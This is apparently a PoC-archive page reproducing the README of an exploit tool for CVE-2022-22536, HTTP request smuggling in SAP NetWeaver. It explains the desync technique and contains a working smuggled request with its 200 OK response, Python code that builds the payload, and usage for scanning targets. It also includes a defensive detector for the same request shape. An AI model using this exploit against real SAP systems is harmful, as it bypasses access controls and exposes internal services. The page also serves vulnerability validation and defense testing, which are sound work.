Related vulnerability
Title:
Environment issue vulnerability in multiple SAP products
(CVE-2022-22536)
Description: SAP NetWeaver Application Server Java and others are products of the German company SAP. SAP NetWeaver Application Server Java is an application server that provides a Java runtime environment. SAP NetWeaver Application Server is an application server. SAP ERP is a suite of software for ERP management. SAP CRM is a customer relationship management system. Sap Crm Web Channel and others are products of the German company SAP. Sap Crm Web Chann
Description
SAPGateBreaker is a PoC exploit for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver. It demonstrates how to bypass ACLs by desynchronizing request parsing between ICM and backend services using crafted Content-Length-based payloads.
Introduction
# CVE-2022-22536: HTTP Smuggling Through SAP's Front Door
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
# SAPGateBreaker-Exploit


The vulnerability identified as CVE-2022-22536 represents a critical flaw in SAP NetWeaver Application Server, exposing installations to HTTP Request Smuggling attacks. This vulnerability, with a CVSS score of 9.8, affects both Java and ABAP stacks, allowing attackers to bypass access control mechanisms and interact with internal applications as though they were on the internal network.
**Understanding HTTP Request Smuggling**
HTTP Request Smuggling (HRS) is an advanced technique that exploits discrepancies in how different components of a web infrastructure (typically proxies, load balancers, and backend servers) interpret the boundaries between HTTP requests. By manipulating headers like `Content-Length` and `Transfer-Encoding`, an attacker can "smuggle" a malicious request that is desynchronized from what the backend server expects.
In essence, when a front-end and a back-end server disagree on where one request ends and the next begins, an attacker can inject a second, hidden request that will be processed with elevated trust. This often results in security bypasses such as WAF evasion, cache poisoning, or ACL circumvention.
**The Nature of CVE-2022-22536**
SAP’s ICM (Internet Communication Manager) improperly parses crafted HTTP requests, enabling a smuggled request to reach internal services. This is particularly impactful in segmented architectures, where direct access to internal services is restricted. Exploiting this vulnerability allows attackers to issue requests that appear to originate from the trusted internal network.
The vulnerability manifests when a payload abuses conflicting interpretations of the end of an HTTP request. This commonly involves injecting a `Transfer-Encoding: chunked` header or manipulating the `Content-Length` field to cause the desynchronization.
**Initial Payload Failures and Chunked Encoding Rejection**
During testing, payloads leveraging canonical chunked smuggling techniques led to `408 Request Timeout` responses from SAP ICM. This behavior indicated that SAP's HTTP stack does not support `Transfer-Encoding: chunked` in the expected manner, preventing traditional chunked-based desynchronization.
As a result, the exploit methodology shifted to using `Content-Length` headers for desynchronization. A crafted request with an empty chunked payload followed by a valid secondary HTTP request successfully bypassed request boundaries. This alternate strategy proved effective in bypassing internal access controls.
**Final Exploit Strategy and Code Implementation**
The working exploit sends a POST request to a public endpoint (`/sap/admin/public/default.html`) with a `Content-Length` header, followed by an embedded GET request that is intended to reach an internal resource.
```http
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
Authorization: Basic YTph
Cookie: saplb_*=(J2EE7364720)7364750
Content-Type: application/json
Content-Length: 128

0

GET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Connection: close
```
This results in a successful internal access:
```http
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
Content-Length: 4465
Content-Type: text/html
Connection: Keep-Alive
```
The implementation iterates through a list of internal SAP URLs that are normally restricted. A comparison is made between the status code received via direct access and the one received when accessed through the smuggled request. If the internal access returns 200 (while direct access returns 403 or 404), it indicates that the smuggling technique successfully bypassed internal access controls.
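As an added defensive counterpart (this is not code from SAPGateBreaker or from SAP), the following check shows what a reverse proxy or traffic inspector in front of ICM can flag in the request shape described above: a `Content-Length` body that opens with a chunk terminator, carries an embedded request line, or is accompanied by a conflicting `Transfer-Encoding` header. The two sample requests are constructed here from the page's example values.

```python
import re
from typing import List

# Constructed sample requests (not captured traffic). SMUGGLED reproduces the
# Content-Length-based shape described above; BENIGN is an ordinary JSON POST.
SMUGGLED = (
    b"POST /sap/admin/public/default.html HTTP/1.1\r\nHost: 172.32.22.7:50000\r\n"
    b"Content-Type: application/json\r\nContent-Length: 128\r\n\r\n"
    b"0\r\n\r\n"
    b"GET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1\r\n"
    b"Host: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
)
BENIGN = (
    b"POST /sap/admin/public/default.html HTTP/1.1\r\nHost: 172.32.22.7:50000\r\n"
    b'Content-Type: application/json\r\nContent-Length: 13\r\n\r\n{"ok": true}\n'
)

# A request line at the start of a line inside a body is never legitimate JSON.
REQUEST_LINE = re.compile(rb"^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) \S+ HTTP/1\.[01]\r?$", re.M)


def inspect_request(raw: bytes) -> List[str]:
    """Return findings for one raw HTTP/1.1 request; an empty list means no issue."""
    findings: List[str] = []
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete request: no header terminator"]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line itself
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    if cl and te:
        findings.append("both Content-Length and Transfer-Encoding present")
    if len(cl) > 1 or any(not v.isdigit() for v in cl):
        findings.append("ambiguous Content-Length header")
        return findings  # cannot trust the declared length below
    if cl and not te:
        declared = int(cl[0])
        if body.startswith(b"0\r\n\r\n"):
            findings.append("body opens with a terminating chunk inside a Content-Length body")
        if REQUEST_LINE.search(body[:declared]):
            findings.append("embedded HTTP request line inside declared body")
        if len(body) > declared:
            findings.append("bytes beyond Content-Length: a second request on the same connection")
    return findings
```

Any non-empty result is a reason to reject the request at the edge or to write it to a log for review, since none of these shapes occur in a well-formed JSON POST.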
The logic for building the payload:
```python
def build_smuggled_request(path):
    # Terminating "0" chunk followed by the embedded GET request for `path`
    return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
```
The attack is executed using a crafted POST request containing the smuggled payload:
```python
# host, port and body are set elsewhere in the tool; body is the string
# returned by build_smuggled_request().
headers = {
    "Host": f"{host}:{port}",
    "Authorization": "Basic YTph",
    "Cookie": "saplb_*=(J2EE7364720)7364750",
    "Content-Type": "application/json",
    # the declared length covers the entire embedded request
    "Content-Length": str(len(body.encode("utf-8"))),
}
```
**Observed Results**
In multiple test cases, endpoints such as `/sap/public/bc/icf/info` or `/heapdump/`, which normally returned `403 Forbidden` or `404 Not Found`, responded with `200 OK` when accessed through the smuggled request. This demonstrates a successful circumvention of SAP’s access controls.
The tool’s output included both sent payloads and response headers, enabling precise forensic validation:
```
>>> Sent Payload:
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
...
>>> Received Response:
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
...
```
Normal Request: (screenshot)
Exploit Request: (screenshot)
**Conclusion**
CVE-2022-22536 highlights the persistent threat posed by HTTP Request Smuggling in modern enterprise software stacks. The presented proof-of-concept is a demonstration of the underlying vulnerability and serves as a tool for validation and defense testing.
Administrators are strongly advised to apply SAP security updates and implement appropriate reverse proxy protections to prevent malformed HTTP request propagation.
More details on CVE-2022-22536 can be found at:
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
SAP Security Note:
https://launchpad.support.sap.com/#/notes/3123396
**SAPGateBreaker Exploit**
SAPGateBreaker is a standalone Python tool that automates testing for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server.
---
**Usage**
```bash
python3 sapgatebreaker.py -u http://<target-host>:<port> [--verbose]
```
**Arguments:**
- `-u`, `--url`: Target URL (e.g., `http://172.32.22.7:50000`)
- `-v`, `--verbose`: Enables detailed header and body output for each request and response
**Features:**
- Detects SAP NetWeaver version via HTTP header inspection
- Builds desynchronized HTTP request payloads for internal access testing
- Compares direct vs. smuggled responses to identify bypasses
- Logs all data to `poc.txt` for further analysis
**Remediation:**
https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation/ba-p/13528083
**Disclaimer**
This tool is intended for educational and authorized penetration testing only. Unauthorized use against systems without explicit permission is strictly prohibited and may violate applicable laws.
File snapshot
[4.0K] /data/pocs/a0c8d4cc9c9ec2e3fcb3dc3a67313deb13f27c7c
├── [ 485] dorks
├── [1.0K] LICENSE
├── [7.8K] README.md
└── [9.0K] sapgatebreaker.py
0 directories, 4 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.